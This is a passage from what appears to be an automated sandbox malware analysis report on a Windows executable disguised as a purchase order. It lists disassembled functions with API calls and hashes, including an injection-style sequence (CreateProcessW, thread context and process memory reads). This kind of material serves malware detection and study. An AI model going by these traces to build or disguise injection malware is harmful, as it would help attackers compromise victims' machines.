                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _strcat
                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 1765576173-985769036
                                  • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                  • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                  Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                  Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                  • String ID:
                                  • API String ID: 1794320848-0
                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                  Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$CurrentTerminate
                                  • String ID:
                                  • API String ID: 2429186680-0
                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                  Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_
                                  • String ID:
                                  • API String ID: 1144537725-0
                                  • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                  • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                  Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                  Download Yara Rule
                                  APIs
                                  • _malloc.LIBCMT ref: 0043214B
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _malloc.LIBCMT ref: 0043215D
                                  • _malloc.LIBCMT ref: 0043216F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc$AllocateHeap
                                  • String ID:
                                  • API String ID: 680241177-0
                                  • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                  • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                  Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TranslateMessage.USER32(?), ref: 00409556
                                  • DispatchMessageW.USER32(?), ref: 00409561
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Message$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 4217535847-0
                                  • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                  • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                  • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                  • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                  Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                  • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                  • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                  • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                  Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                                  • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                  • Opcode Fuzzy Hash: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                                  • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                  Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                  • _strcat.LIBCMT ref: 0040F786
                                    • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                  • String ID:
                                  • API String ID: 3199840319-0
                                  • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                  • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                  Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                  Download Yara Rule
                                  APIs
                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FreeInfoLibraryParametersSystem
                                  • String ID:
                                  • API String ID: 3403648963-0
                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                  Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  • __lock_file.LIBCMT ref: 00414A8D
                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                  Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • __lock_file.LIBCMT ref: 00415012
                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                  Function 0400130D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04001ACB
                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04001B61
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04001B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1475151647.0000000004000000.00000040.00000020.00020000.00000000.sdmp, Offset: 04000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4000000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                  • String ID:
                                  • API String ID: 2438371351-0
                                  • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                  • Instruction ID: d749cf45c4ae1fd2346e7ca9bffd4c682ecf7e6b10967a4b5aea6aab9a317735
                                  • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                  • Instruction Fuzzy Hash: 9312DD24E24658C6EB24DF60D8507DEB272EF68300F1090E9910DEB7A5E77A5F81CF5A
                                  Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                  • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                  • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                  • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                  Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                  • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                  • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                  Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
